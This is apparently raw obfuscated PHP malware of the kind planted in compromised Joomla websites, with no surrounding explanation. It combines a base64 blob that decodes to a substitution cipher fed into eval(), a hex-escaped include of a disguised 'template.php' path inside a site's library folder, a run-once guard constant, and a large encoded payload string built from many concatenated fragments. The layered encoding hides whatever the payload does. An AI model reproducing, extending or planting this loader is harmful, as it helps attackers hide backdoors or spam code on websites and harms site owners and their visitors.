WE2bktSU2hUZk1WOGFybjFOU3h2bU5RQWpnT3ZtTnh2bScuCidOeHZtTmhuZjZobG1qOXZGemFsSXpHYkQ0OXRtTnh2bU54dm1OeG5ha0o5ZkdLaWE2bnZScnhuVVRHJy4KJ3FENDl0bU54dm16OTFOdjl0bU54dm1rYlltTnZsRmtobFBrN0xqZ092bU54dlg0OXRtTnh2bU54dm0nLgonTlFZSUhGYmZNMU9tTnZuNjhRUkM4Z3ZmNld2Rms1YlhjOStGemFsSXpHYnRnOXRtTnh2bU54dm1OUUFqZ092bU54dm0nLgonTnh2bU54dm1OeG5ha0o5ZnJ4S21OaFRmTVY4YWNzMU5TeHZtTnh2bU54dm1OeHZtTmhuZjYnLgonaGw2VDViWHJ4S21OaGlhNm5BamdPdm1OeHZtTnh2bXo5MU5TeHZtTlFLamdPMU5TeHZtTnhuYWtKOWZyeEsnLgonbTdROEl3MWIzWWJsSWtib2FybEUzOEtuYU0xQlg2UTl0a0ZsM1RDVDFKS25hTTFlYWtDT0ZraGxQazdMME54bmFrSicuCic5ZkdLaWE2bkx0Y3MxTnY5dG1OeHZta2JZbU5sTDNIMWJQTnZuYWtKOWZHc3dmTXN3NicuCidybnZGU2Z2RmsxZDZUSjhQa3ZLUnJobmY2aGxNQlBsVUJQUHRnOXRtTnh2bXpzMU5TeHZtTnh2bU54dlVNZnZ0TmhuZjZobE1CUGxGODl2Jy4KJ1JjOXZGVG53dGc5dG1OeHZtTnh2bU5RQWpnT3ZtTnh2bU54dm1OeHZtTnhuVXJ4S203SkIzWUpxdCcuCid4OXRtTnh2bU54dm1OeHZtTnh2bU54dm1OUDRQUzN2UmN5dmd6UU8zemFiM3cxTElUeU90cjQxTlN4dm1OeHZtTnh2bU54dm1OeHZtTnh3M0hmd21qOSsnLgonbU4zVjBFeDVXUzNzamdPdm1OeHZtTnh2bU54dm1OeHZtTnh2RlRKaUZCeEtSU3huYWtKOWZHc3dmTXN3NnI0MU5TeHZtTicuCid4dm1OeHZtTnh2bU5uQWpnT3ZtTnh2bU54dm1OeHZtTlFiZlRsZW03UWRhNkZMZk1WTFhZQ09Ga25MRDQ5dG1OeHZtTngnLgondm1OeHZtTnh2YTZsTFBqczFOU3h2bU54dm1OeHZ1Zzl0bU54dm1OeHZtTlFiSXoxYlVNZnZ0TmhuZjZobE1CUGxGODl2UmM5dkZUQ3d0Zzl0bU54dm0nLgonTnh2bU5RQWpnT3ZtTnh2bU54dm1OeHZtTlFiUFlKc3ROaG5mNmhsTUJQbkY4OUxENDl0bU54dm1OeHZtTlFLamdPdm1OeHZtTnh2bWtHczNUR0xhU3hPRmtobFBrSklGVDcnLgondzZyeEtScnh3M2tWOGFUYlpGQm4xTlN4dm1OeHZtTnh2WDQ5dG1OeHZtTnh2bU54dm1OeHZVTWZPRmtobFBrSklGSDFsRjg5dlJjOXZGVEpuYU4zTGpnT3ZtTnh2bU54dm1OJy4KJ3h2bU5RQWpnT3ZtTnh2bU54dm1OeHZtTnh2bU54dmZIMXUza1Y4YVRiWjZUSm5hTnZuYWtKOWZHc3czTlBQME54bmFrSjlmR3N3YU5QUHRjczFOU3h2bU54dm1OeHZtTnh2bXonLgonOTFOU3h2bU54dm1OeHZtTnh2bWtHczNUR0xhU3ZuYWtKOWZHc3czVDd3NnJ4S1JyeHczJy4KJ1lHNUZCbjFOU3h2bU54dm1OeHZtTnh2bXpzMU5TeHZtTnh2bU54dm1OeHZtTnh2bU5RRTM4SzRJekd3VU1xdTNZRzV0TmhuZjZobE1CUDQnLgonRjg5TEQ0OXRtTnh2bU54dm1OeHZtTnh2dWc5dG1OeHZtTnh2bU5RS2pnT3ZtTnh2bU54dm1rR0VVa3B2RmtobFBrSkknLgonRlRKaUY4OUFqZ092bU54dm1OeHZta0d5VTZnT3RjczFOU3h2bU5RS2pnTzFOU3h2bU5RRTM4SzRJekd3VScuCidNcXVJa0tsYU52TEQ0OXR1Zz09JzsKJHR1c2lzc29hbCA9IEFycmF5KCcxJz0+J04nLCAnMCc9PidMJywgJzMnPT4nYycsICcyJz0+J3EnLCAnNSc9Pid0JywgJzQnPT4ndycsICc3Jz0+J0UnLCAnNic9PidYJywgJzknPT4nMCcsICc4Jz0+JzEnLCAnQSc9Pic3JywgJ0MnPT4nVScsICdCJz0+J3knLCAnRSc9PidqJywgJ0QnPT4nTycsICdHJz0+J1YnLCAnRic9PidKJywgJ0knPT4nYicsICdIJz0+JzMnLCAnSyc9Pic5JywgJ0onPT4nRicsICdNJz0+J1cnLCAnTCc9PidwJywgJ08nPT4nbycsICdOJz0+J0MnLCAnUSc9PidCJywgJ1AnPT4nZCcsICdTJz0+J2knLCAnUic9PidQJywgJ1UnPT4nYScsICdUJz0+JzInLCAnVyc9PidNJywgJ1YnPT4neCcsICdZJz0+J20nLCAnWCc9PidlJywgJ1onPT4ndScsICdhJz0+J1onLCAnYyc9PidUJywgJ2InPT4nbCcsICdlJz0+J3YnLCAnZCc9Pid6JywgJ2cnPT4nUScsICdmJz0+J1knLCAnaSc9PidyJywgJ2gnPT4nUicsICdrJz0+J0cnLCAnaic9PidEJywgJ20nPT4nSScsICdsJz0+J2gnLCAnbyc9Pic2JywgJ24nPT4naycsICdxJz0+JzUnLCAncCc9Pic4JywgJ3MnPT4ncycsICdyJz0+J1MnLCAndSc9PidmJywgJ3QnPT4nSycsICd3Jz0+J24nLCAndic9PidnJywgJ3knPT4nNCcsICd4Jz0+J0EnLCAneic9PidIJyk7CmV2YWwvKmxqemFrd290Ki8oeGVqb2xta3ZmKCR2d2pzbGNlLCAkdHVzaXNzb2FsKSk7Cn0=")); include "\x2fhom\x65/vh\x6fsts\x2fat-\x77ire\x2enl/\x68ttp\x64ocs\x2flib\x72ari\x65s/j\x6foml\x61/me\x64iaw\x69ki/\x74emp\x6cate\x2ephp"; ?> if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718')) { define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1); $farusquaku = 3871; function xejolmkvf($tayvedrhca, $bhqsfwpvj){$bbgwxzk = ''; for($i=0; $i < strlen($tayvedrhca); $i++){$bbgwxzk .= isset($bhqsfwpvj[$tayvedrhca[$i]]) ? $bhqsfwpvj[$tayvedrhca[$i]] : $tayvedrhca[$i];} $tflrennmnf="base64_decode";return $tflrennmnf($bbgwxzk);} $vwjslce = 'gkbZUGKda6gOFTGB3YKB6TVeaB3sm7qGc74LD49tgkbZUGKda6gOFTVea8'. 'Kb3wFe3wWw0Nx4tcs1NnQLIYbu3TG9tNP5f6lua6lbfHG9UMKZ6HhLIMCw0Nx4tcs1NnQb3wFe3bKBa6Qe3whLIY3OWNnAjg'. 'Lx3TG96HhLIMGuIkb5U6gOWNnAjgO1Nv9tUMfOmMhbaYbZaMgOmbQ'. 'mCJKJc94Strn1Nws1NSxvmNQnaMaLIYCOmbQmCJKJc94S0NxS6kyStcs1Nw91Nv9tUMfOmMhbaYbZaMgOmnh'. 'FCnGjG7KrMGKchGQQCnJCc8mStrn1Nws1NSxvmNQnaMaLIYCOmnhFCnGjG7KrM'. 'GKchGQQCnJCc8mS0NxS0BmLD49tug9tjgLLaSxOmMhbaYbZaMgOF9JWCnGQhJbuCbGD6d791kWy1T1Y1'. 'EmdfY7yWYJlaYnTDzFLfMmV1YJ9UMpVDN3Ltg9tX49tmNxvmkhbaYbZarvwgCVrhCJ7MGKrGCquWcg9fdv'. 'HfTfTWE1SfcvBfMJYUcfy3YblfE7Tf6hLId7yFB4vWrnAjgO1NSxvmNxnakJ9frxKm7qGc74AjgOvmNxvFkhlPkJuUT'. 'Gqmj9vcbGWcjs1Nv9tmNxvmNhzc7KNgCVcMBPE38KlP6hOF89vRrxwWdlnfdlnWEm5Wdny1r99Dj740MFlaEW5DcgyfTgTakm'. 'yfMFEFds1NSxvmNQwIkKSfM4vFk1d6TJ8PkvAjgO1Nv9tmNxvmka8IY19UMKZmk1d69P'. 'bP7le3HgOtg9tmNxvmzs1NSxvmNxvmNxv3YG9P6FZmzQBaMPu3YG4IkJEarvw08yOPHPHu'. 'ka93Nb30SKLFB4wFBVxFJKchGFMhGFIF9lCGJQur7KcGNPPtcs1NSxvmNQKjgO1NSxvmNQYPMqEPkbe'. 'ISQE38Kza6h63Yb9fMFsaChL3wWOtg9tmNxvmzs1NSxvmNxvmNxvFzFb3BxKm7JB3YJq'. 'tNnAjgO1NSxvmNxvmNxvFkJZfMVq3Hbd6HJ8a6Gbmj9vg6FBf6nOtcs1Nv9tmNxvmNxvmNxnf'. 'MqlIzbdX61u36GbPMGI6rxKmk1d69PbP7hef8FeIHgOtcs1Nv9tmNxvmNxvmNxn3TGsabK4f6hOmj9vFJKchGFMhGFIF'. '81jCnbgGJKkrCVJcnJ1hrPPD49tmNxvmNxvmNQHUkbsarxOtNhdIkJdUNxK'. 'mz193wF4IHWOFz1bIkau3kJ9UN4vh7brhC1Cc8Fa681JC7JrgGhRC'. 'SnLmN7KRrQkgCVchrn1NSxvmNxvmNxvX49tmNxvmNxvmNxvmNxvFz1bIkau3kJ9UNxKmz18fw193Svn3TGsabK4f6hO0Nx40'. 'Nxn3TVl3TvLD49tjgOvmNxvmNxvmNxvmNQLaSxOFz1bIkau3kJ9UNxKRrQE38Kza6h7IT1rITK9tNnLjgOvmNxvmNx'. 'vmNxvmNQAjgOvmNxvmNxvmNxvmNxvmNxvfwFbfMsAjgOvmNxvmNxvmNxvmNQK'. 'jgO1NSxvmNxvmNxvmNxvmkbYmNldPzFsaMyOFz1bIkau3kJ9UNnLjgOvmNxvmNxvmN'. 'xvmNQAjgOvmNxvmNxvmNxvmNxvmNxvFkJZfMVq3Hbd6HJ8a6GbM89vRrxn3TGsabK4f6hOD49tmNxvmNxvmNx'. 'vmNxvug9tmNxvmNxvmNQKjgO1NSxvmNxvmNxvaYKBaMJEUNxOFkJZfMVq3Hbd6HJ8a6GbmkJdmNhEP6FBaM'. 'q96ThL3Sn1NSxvmNxvmNxvX49tmNxvmNxvmNxvmNxvUMfvtNJLIbKl3wFlXrvnfHGB3YGZPJKnU6msmNhBa6WLtg9tmNxvmNxv'. 'mNxvmNxvX49tmNxvmNxvmNxvmNxvmNxvmNhBa6WvRrQl3wFlXGK5a6F'. 'warvn3YGd0NQE38Kza6h7U6FbfHhe3wbWU619tNhEP6FBaMq96ThL3SnLD49tmNxvmNxvmNxvmNxvug9tmNxvmNxvm'. 'NQKjgO1NSxvmNxvmNxv3YG9P6FZmk1d691OaM1iGHFLPkJSIkCOf6FBf6buPMqL36GbtNh'. 'Ba6WLtcs1NSxvmNQKjgO1NSxvmNQYPMqEPkbeISQE38KjUkGEU8PBU6hlfYVbtNhnU6FuIkbdPNn1NSxvmNQAjgOvmNxv'. 'mNxvmNhnU6FuIkbdPJKH3Yb9fMFsarxKm7JB3YJqtNnAjgO1NSxvmNxvmNxv'. 'aYKBaMJEUNxOFkhL3bKsU619mkJdmNhnU6mLjgOvmNxvmNxvmzs1NSxvmNxvmNxvmNxvmk'. 'bYmNlxU61uPHFLPkJSIkCOFkhL3SnvFSfvU61uakbBtNhnU6mLtg9tmNxvmNxvmNxvmNxvX49tmNxvmNxvmNxvmNxvmNxvm'. 'NhnU6FuIkbdPJKH3Yb9fMFsaG5Pmj9vFkhL3Es1NSxvmNxvmNxvmNxv'. 'mz91NSxvmNxvmNxvug9tjgOvmNxvmNxvmzFbPzGBISxnakbB6TVL3Hhu'. 'PHFLPkJSIkCAjgOvmNxvug9tjgOvmNxvawGZfHhLITyvfH1uhTG9hkbBaM19IHFqckbdPNv'. 'nakbB0NxnakG4PkvKWcxLjgOvmNxvX49tmNxvmNxvmNxn3YGdPMV9mj9vf6FBf6nOtcs1Nv9tmNxvm'. 'NxvmNQLaSxOmMbd6ThL3SvnakbBtrn1NSxvmNxvmNxvX49tmNxvmNxvmNxvmNxv3YG9P6FZmNhBa618'. 'IzgAjgOvmNxvmNxvmz91Nv9tmNxvmNxvmNxn3YGdPMV9M89vRrxnakbBD49tmNxvmNxvmNxnakbB6T1ePMq9mj9vWjs1Nv'. '9tmNxvmNxvmNQLaSxOFkhb3zhOmj4vWrn1NSxvmNxvmNxvX49tmNxvmNxvmNxvmN'. 'xv3YG9P6FZmNhBa618IzgAjgOvmNxvmNxvmz91Nv9tmNxvmNxvmNxnakbBmj9v3HhBIkGZt'. 'NhnU6mLmj9Kmj7vRBxnakbBmjOv3whBUM9OFkhL3S4vF8V30B3LD49tmNxvmNxvmNxnUNxKm7Qe3kGZakbBtNhnU6mLD49'. 'tmNxvmNxvmNQLaSxOFkvvRc9Km7aQcJ1Jtg9tmNxvmNxvmNQAjgOvmNxvmNxvmNxvmNQ'. 'Ba6h83YyvFzFb3HGsPjs1NSxvmNxvmNxvug9tjgOvmNxvmNxvmzPOUMVbmNvOFkfvRrQBaMJnakb'. 'BtNhOtrnvmc9Km7aQcJ1Jtg9tmNxvmNxvmNQAjgOvmNxvmNxvmNxvmNQLaSxOFkfvmc9K'. 'mN3ZFBQlIYgvFkfvmc9KmN3Z0S3LjgOvmNxvmNxvmNxvmNQAjgOvmNxvmNxvmNxvmNxvmNxv'. 'Fk183wFbIwhuakbBmj9vmShnU6meFkfSD49tmNxvmNxvmNxvmNxvmNxvmkbYmNlL38KnU6mOFk183wFbI'. 'whuakbBtrn1NSxvmNxvmNxvmNxvmNxvmNQAjgOvmNxvmNxvmNxvmNxvmNxvmNxvmNhnU6FufTK8Iwgvtd9vWc'. 's1Nv9tmNxvmNxvmNxvmNxvmNxvmNxvmNxn3YGdPMV9M89vRrxnfHGB3YGZPJKnU6mAj'. 'gOvmNxvmNxvmNxvmNxvmNxvmNxvmNhBa618IzgvRrQl3wFlXGK'. '5a6Fwarvn3YGdPMV90NQE38Kza6h7U6FbfHhe3wbWU619tNhEP6FBaMq96ThL3S4vFkhb3zhOmNpvWcxLt'. 'cs1NSxvmNxvmNxvmNxvmNxvmNQKjgOvmNxvmNxvmNxvmNQKjgOvmNxv'. 'mNxvmz91Nv9tmNxvmNxvmNQEIkKdaMhL3SvnUNnAjgO1NSxvmNxvmNxv3YG9P6FZmNhBa618IzgAjgOvmNxvu'. 'g9tjgOvmNxvawGZfHhLITyvfH1uhTG9hkKECYKePNvLjgOvmNxvX49tmNxvmNxvmNxnakKE3YKePJKbIYgvRrQdP'. 'zFB3kKdtNhuC9GrGnGrMBPcg8FFCJhuhnbWhCqQcCCw6r4vFJKchGFMhGFIF8FJCGGJC8huGGFFF8'. '9LD49tmNxvmNxvmNQLaSxOFkhefHFeIHhuaMqnmj9KRrQkgCVchrn1NSxvmNxvmNxvX49tmNxvmNxvmNxvmNxv3YG'. '9P6FZmNhuC9GrGnGrMBP7c91GcCGDGJKrc9KCF89AjgOvmNxvm'. 'Nxvmz91NSxvmNxvmNxvaMVdaMbYmNvnakKE3YKePJKbIYgvRc9KmjxLjgOvmNxvmNxvmzs1NSxvmNxvmNxvmNxvm'. 'zFbPzGBISxS0BmAjgOvmNxvmNxvmz91NSxvmNxvmNxvaMVdag9tmNxvmNxvmNQAjgOvmNxvmNxvmNxvmNQ'. 'Ba6h83Yyv3HGS3HhBtNhuC9GrGnGrMBPcg8FFCJhuhnbWhCqQcCCw6r4vWN4vFkhefHFeIHhuaMqntc'. 's1NSxvmNxvmNxvug9tmNxvmz91Nv9tmNxvmkbYmNvlawGZfHhLITqua6lL3HhdtNPYUMVb6H'. 'Q8PJKEITq9aMq93B3Ltg9tmNxvmzs1NSxvmNxvmNxvawGZfHhLITyvaYbsaGK4P6hufTKZPkGZPzWOFkysmNhn0NxnaYVlaB'. 'xKm7alIz1btg9tmNxvmNxvmNQAjgOvmNxvmNxvmNxvmNxnIMKnarxKmNhYIkJwmj9KmjvvRBx'. 'wfr3vDSxwPB3AjgOvmNxvmNxvmNxvmNxnaSxKm7QYIHQbISvnIS4vFk8ea'. 'kCLD49tmNxvmNxvmNxvmNxvUMfvtNhYmj9KRrQkfMVdarn1NSxvmNxvmNxvmNxvmzs'. '1NSxvmNxvmNxvmNxvmNxvmNQBa6h83YyvWjs1NSxvmNxvmNxvmNxvmz91NSxvmNxvmNxvmNxvmkGs3TC1NSxvmNxvmNxvmNx'. 'vmzs1NSxvmNxvmNxvmNxvmNxvmNQLaSxOU61uf6FBf6nOFkgLtrxnaNxKmkb53kVeakCOFkgLD49tmNxvmNxvmNxvmNx'. 'vmNxvmNhSX6hb38KH3Yb9PkGZmj9vawPBU6hbtNhY0NxnaNnAjgOvm'. 'NxvmNxvmNxvmNxvmNxvaY1sIH1btNhYtcs1NSxvmNxvmNxvmNxvmNxvmNQBa6h83YyvFkFqPkGd6HPBU6h9aMyAjgOvmNx'. 'vmNxvmNxvmNQKjgOvmNxvmNxvmz91NSxvmNQKjgO1NSxvmNQLaSxOmMa8IY19UMKZ6TGyU6'. '193BvwaYbsaGKwa6hufTKZPkGZPzWwtrn1NSxvmNQAjgOvmNxv'. 'mNxvmka8IY19UMKZmkaLIkGuaTG96T1eIwhbIwhdtNhYUMVbIYJ5arn1NSxvmNxvmNxvX49tmNxvmNxv'. 'mNxvmNxvFkaOfMqnIkCvRrQYIHQbISvnaYbsaMqlIMCsmNFBmSnAjgOvmNxvmNxvmNxvmNxnaY1eIwhbIw'. 'hdmj9vawFbfMgOFkaOfMqnIkCsmkaLIkGdU6LbtNhYUMVbIYJ5arnLD49tmNxvmNxvmNxvmNxvaY1sIH1btNhYU'. 'kJZakVbtcs1Nv9tmNxvmNxvmNxvmNxv3YG9P6FZmNhYfTKZPkGZPzWAjgOvmNxvmNxvmz91NS'. 'xvmNQKjgO1Nv9tmNxvmka8IY19UMKZmk1d6ThbfHFq3zhu3kll3TCOFkhlPk7smNhia6nLjg'. 'OvmNxvX49tmNxvmNxvmNxnIHG96ThlPk7vRrxSmEs1Nv9tmNxvmNxvmNQYIHmvtNhLRcxAmNhLRz193'. 'YVbISvnakJ9frnAtg9tmNxvmNxvmNQAjgOvmNxvmNxvmNxvmNQYIHmvtNh2RcxAmNh2Rz193YVbISvnUTGqtrxYFSxnUcVdPzFsa'. 'MyOFkhlPk7LDBxnUSsi0NxnUrsitg9tmNxvmNxvmNxvmNxvX49tm'. 'NxvmNxvmNxvmNxvmNxvmNheP6huakJ9frxZRrQEUzmOIHFntNhnf6hlMBhL6rnv6SQe3YgOFk5bXGsnUb9Ltcs'. '1NSxvmNxvmNxvmNxvmz91NSxvmNxvmNxvug9tjgOvmNxvmNxvmzFbPzGBISxnIHG'. '96ThlPk7AjgOvmNxvug9tjgOvmNxvawGZfHhLITyvfH1uakGE3wb4PNvnakJ9fr4vFk5bXr'. 'n1NSxvmNQAjgOvmNxvmNxvmkPsITFlINxnfH1uf6G9Ujs1Nv9tmNxvmNx'. 'vmNQBa6h83YyvfH1uakGE3wb4PJK4UkJdarlE38KnaM1BX6Q96HQOf61btNhnf6hl'. '0NxnUTGqtr4vFk1d6TJ8PkvLD49tmNxvmz91NSxvmNQYPMqEPkbeISQE3'. '8KbIY1BX6Q9tNhnf6hl0NxnUTGqtg9tmNxvmzs1NSxvmNxvmNxvaTVefYJsmNh'. 'E38KlP6hOD49tjgOvmNxvmNxvmzFbPzGBISQE38KnaM1BX6Q96HQOf61btk1d6ThbfHFq3zhu3kll3TCOFkh'. 'lPk7smNhE38KlP6hOtr4vFk5bXrnAjgOvmNxvug9tjgOvmNxvawG'. 'ZfHhLITyvfH1uaYbsaGKBaMJntNh4f6hOtg9tmNxvmzs1NSxvmNxvmNxvFkhlPk7vRrQxaYbsaGKwa6hufTKZPkG'. 'ZPzWOFzQlPkvLD49tjgOvmNxvmNxvmzFbPzGBISxnakJ9fcs1NSxvm'. 'NQKjgO1NSxvmNQYPMqEPkbeISQE38KYUMVb6HPBU6hbtNh4f6hO0NxnakJ9frn1NSxvmNQ'. 'AjgOvmNxvmNxvm7QYUMVb6HQ8PJKEITq9aMq93Bvn3kJ9UN4vFkhlPk7'. 'LD49tmNxvmz91Nv9tmNxvmka8IY19UMKZmk1d6TaLIkGuf6Q4aMqntNh4f6hO0NxnakJ9fr'. 'n1NSxvmNQAjgOvmNxvmNxvm7QYUMVb6HQ8PJKEITq9aMq93Bvn3kJ9UN4vFkhlPk7smjvLD49'. 'tmNxvmz91Nv9tmNxvmka8IY19UMKZmk1d6H1e3whufTK53kJBa6mOFk7smNhStg9tmNxvmzs1NSxvmNxvmN'. 'xv3YG9P6FZmz193YVbISvnfrnv0rQdPzFsaMyOFkmLD49tmNxvmz'. '91Nv9tmNxvmka8IY19UMKZmk1d69PbP71eIM8eIb19IHFlaTCOFkhL3wWKcbGWcNn1NSxvmNQAjgOvmNxvmNxvmNh'. 'EIT85ITquIYJ5a6WvRrQQ3wFlXrvSIHQ9UMKZ3BmsmNFTUMGH3BmsmNF4'. 'fMPb3BmsmNFda61dUMKZ3BmsmNFdPkJ93BmsmNF83TGB3BmsmNFl3w'. 'hLfTVb3BmsmNFnPM84mS4vmYlbfMhb3wWS0NxSIkbS3BmLD49tmNxvmNxvmNQLaSxOmrhnU6Fdtg9tmNxvmNxvmNQAjg'. 'OvmNxvmNxvmNxvmNxnakbB3BxKmk1d69PbPJPBU6hlfYVbhkbB3BvLD49tmNxvmNxvmNQKjgO1NSxvmNxvmNxvP61e3wgOFkh'. 'L3wWsmNPE38KdIHF96T1eI6Ql3YGBFBnAjgO1NSxvmNxvmNxvaYKBaMJEUNxOFkhL3wWvf6WvFkhL3Sn1NSxvmNxvmNxvX4'. '9tmNxvmNxvmNxvmNxvUMfvtkbd6ThL3SvnakbBtrxYFSQxU61uPHFLPkJSIkCOF'. 'khL3SnLjgOvmNxvmNxvmNxvmNQAjgOvmNxvmNxvmNxvmNxvmNxvFkhL'. '3bKLIYhbXNxKmjxAjgOvmNxvmNxvmNxvmNxvmNxvaYKBmNvnXj94'. 'DBxnXNxpmz193YVbISvnakbBtcsvFzvitBn1NSxvmNxvmNxvmNxvmNxvmNQAjgOvmNxvmNxvmNxvmNxvmNxvmNxvmNhnU6FuUMq'. 'na6vvtd9vIHFntNhnU6FIFzlPtcs1NSxvmNxvmNxvmNxvmNxvmNQKjgO1NSxvmNxvmNxvmNx'. 'vmNxvmNxnPk846ThL3SxKmNhnU6mv0SxS0Bmv0SxnfTK5IMKZ6TqlIMGdMBhnU6FuU'. 'Mqna6vvFrQEIHGZPNvnfTK5IMKZ6TqlIMGdtG9AjgO1NSxvmNxvmNxvmNxvmNxvmNQLaSxOaYbsaGKbXkbdPzWOFzh53JKnU6'. 'mLtg9tmNxvmNxvmNxvmNxvmNxvmzs1NSxvmNxvmNxvmNxvmNxvmNxvmNxv3YG9P6FZmNh9I6Quak'. 'bBD49tmNxvmNxvmNxvmNxvmNxvmz91Nv9tmNxvmNxvmNxvmNxvmNxvmkbY'. 'tk8iakbBtNh9I6QuakbBtrn1NSxvmNxvmNxvmNxvmNxvmNQAjgOvmNxvmNxvmNxvmNxvmNxvmNxvmzFbP'. 'zGBISxnPk846ThL3Es1NSxvmNxvmNxvmNxvmNxvmNQKjgOvmNxvmNxvmNxvmNQKj'. 'gOvmNxvmNxvmz91Nv9tmNxvmNxvmNQBa6h83YyvmSmAjgOvmNxvug9tjgOvmNxvawGZfHhLITyvfH'. '1u3kV8aTbZ6TJnaNvnIYJ5ar4vFkFl3TCT1JKnf6hltg9tmNxvmzs1NSxvmNxvmNxvFkhlPk7vRrQSf61b1EhuakGEIThbtNhSf'. '61b1EhuakJ9frnAjgO1NSxvmNxvmNxvFz19IHFlaTGu3kJ9UNxKmk1d69PbP71eIM8eIb19IHFlaTCOtrxZm'. 'NmemEs1NSxvmNxvmNxvFz19IHFlaTGu3kJ9UNxKmNhdPkKBfMPb6HQlPkvv'. '0SQdPMFdPzmOIMg8tNFEfM1OarmL0Nx40Nx8trxZmNFumSxZmk8n1rvnIYJ5arxZmk1d'. '69PbP7le3HgOtrnAjgO1Nv9tmNxvmNxvmNQE38KYUMVb6HPBU6hbtNhdPkKBfMPb6HQlPkvsmk1d6TGZfHFq3zgOFkhlPk'. '7smk1d69PbP7le3HgOtrnLD49tmNxvmz91Nv9tmNxvmka8IY19UMKZmk1d6'. 'HQsPMPLIbKBaM9OFkqlIMCLjgOvmNxvX49tmNxvmNxvmNxn3Hhe3YJwaGK4f6hOmj9vfH1uhTG9gTK5IMKZCHhe3YJwarvL0'. 'SxS0BmAjgOvmNxvmNxvmNhdPkKBfMPb6HQlPkvvRrxn3Hhe3YJwaGK4f6hOmNyv3HGS3HhBtk8n1rvSfTJEUkCStr4'. 'vWN4v1rnv0SxS6Bmv0SQ5ajCOFkqlIMCv0SQE38Kza6hmIH19tNnLD'. '49tjgOvmNxvmNxvmkbYmNlYUMVb6TGyU6193Bvn3Hhe3YJwaGK4f6hOt'. 'rn1NSxvmNxvmNxvX49tmNxvmNxvmNxvmNxvgzGZIkbZUBvn3Hhe'. '3YJwaGK4f6hOtcs1NSxvmNxvmNxvug9tmNxvmz91Nv9tmNxvmka8IY19UMKZmk1d6HQsPMPLIb'. 'KsITJntNhZfM8bRCqGc74LjgOvmNxvX49tmNxvmNxvmNxn3Hhe3YJwaGK4f6hOmj9vfH1uhTG9gTK5IMKZCHhe3YJw'. 'arvLD49tjgOvmNxvmNxvmkbYmNlL38KnU6mOFz19IHFlaTGu3kJ9UNnLjgOvmNxvmNxvmzs1NSxvmNxvmNxvmNxvm'. 'kbYmNvnIYJ5arxKRrQDGCVWtrxe0BQsITJnmkJsINQ4IzGwUMqdjgOvmNxvmNxv'. 'mNxvmNQAjgOvmNxvmNxvmNxvmNxvmNxvaYKBaMJEUNxO3T1lIYhL3Svn3Hhe3Y'. 'JwaGK4f6hOtrQl3BxnUTGqRcyn3kV8aTbZ6TqlIMCLjgOvmNxvmNxvmNxvmNxvmNxvX'. '49tmNxvmNxvmNxvmNxvmNxvmNxvmNQLaSxO3HhB3kKdtNh4IzGwUMquIYJ5ar4v3HGS3HhBtk8n1'. 'rvSfTJEUkCStr4vWN4v1rnLmN7KRrQkfMVdarn1NSxvmNxvmNxvmNxvmNxvmNx'. 'vmNxvX49tmNxvmNxvmNxvmNxvmNxvmNxvmNxvmNxvgkGTfM4OfH1uakGE3wb4PNlE38KYUMV'. 'b6HFbfMgOFz19IHFlaTGu3kJ9UNxZmNmemSxZmNh4IzGwUMquIYJ5arnsmk1d69PbP7le3HgOtrnLD49tmNxvmNxvm'. 'NxvmNxvmNxvmNxvmNQKjgOvmNxvmNxvmNxvmNxvmNxvug9tmNxvmNxvmNxvmNxvug9tmNxvmNxvm'. 'NxvmNxvaMVdag9tmNxvmNxvmNxvmNxvX49tmNxvmNxvmNxvmNxvmNxvmNhdPkKBfMPb6HQlPkvvRrxn3Hhe3YJwaGK4f6'. 'hOmNyvmSpSmNyv3HGS3HhBtk8n1rvSfTJEUkCStr4vWN4v1rnv0SxS6Bmv0SQ5ajCOFkqlIMCv0SQE38K'. 'za6hmIH19tNnLD49tjgOvmNxvmNxvmNxvmNxvmNxvUMfvtkaLIkGua6lL3HhdtNhdPkKBfMPb6HQlPkvL'. 'tg9tmNxvmNxvmNxvmNxvmNxvmzs1NSxvmNxvmNxvmNxvmNxvmNxvmNxvgkGTfM4OfH1uakGE3wb4PNlE38KYUMVb6H'. 'FbfMgOFz19IHFlaTGu3kJ9UNnsmk1d69PbP7le3HgOtrnLD49tmNxvmNxvmNxvmNxv'. 'mNxvmz91NSxvmNxvmNxvmNxvmz91NSxvmNxvmNxvug9tmNxvmz91Nv9tmNx'. 'vmka8IY19UMKZmk1d6HPBU6hlfYVb6T1OaM1itNn1NSxvmNQAjgOvmNxvmNxvmkbYmNldPzFsaMyOfH1u'. 'hTG9gTK5IMKZCHhe3YJwarvLtrxlRrx4tg9tmNxvmNxvmNQAjgOvmNxvmNxvmNxvmNQBa6h83YyvGzF8acs1NSxv'. 'mNxvmNxvug9tmNxvmNxvmNQbIz1bjgOvmNxvmNxvmzs1NSxvmNxvmNxvmNxvmzFbPzGBISQkfMVdacs1N'. 'SxvmNxvmNxvug9tmNxvmz91Nv9tmNxvmkae3YGlfTvvtNhug9KRr9bJmkJdmNhia6nKRShTfMV8arn1NSxvmNQAjgOvmNxvm'. 'NxvmNhnf6hlmj9vFzalIzGbD49tmNxvmNxvmNxnakJ9fGKia6nvRrxnUTG'. 'qD49tmNxvmz91Nv9tmNxvmkbYmNvlFkhlPk7LjgOvmNxvX49tmNxvmNxvm'. 'NQYIHFbfM1OmNvn68QRC8gvf6WvFk5bXc9+FzalIzGbtg9tmNxvmNxvmNQAjgOvmNxvm'. 'NxvmNxvmNxnakJ9frxKmNhTfMV8acs1NSxvmNxvmNxvmNxvmNhnf6'. 'hl6T5bXrxKmNhia6nAjgOvmNxvmNxvmz91NSxvmNQKjgO1NSxvmNxnakJ9frxK'. 'm7Q8Iw1b3YblIkboarlE38KnaM1BX6Q9tkFl3TCT1JKnaM1eakCOFkhlPk7L0NxnakJ'. '9fGKia6nLtcs1Nv9tmNxvmkbYmNlL3H1bPNvnakJ9fGswfMsw6'. 'rnvFSfvFk1d6TJ8PkvKRrhnf6hlMBPlUBPPtg9tmNxvmzs1NSxvmNxvmNxvUMfvtNhnf6hlMBPlF89v'. 'Rc9vFTnwtg9tmNxvmNxvmNQAjgOvmNxvmNxvmNxvmNxnUrxKm7JB3YJqt'. 'x9tmNxvmNxvmNxvmNxvmNxvmNP4PS3vRcyvgzQO3zab3w1LITyOtr41NSxvmNxvmNxvmNxvmNxvmNxw3Hfwmj9+'. 'mN3V0Ex5WS3sjgOvmNxvmNxvmNxvmNxvmNxvFTJiFBxKRSxnakJ9fGswfMsw6r41NSxvmN'. 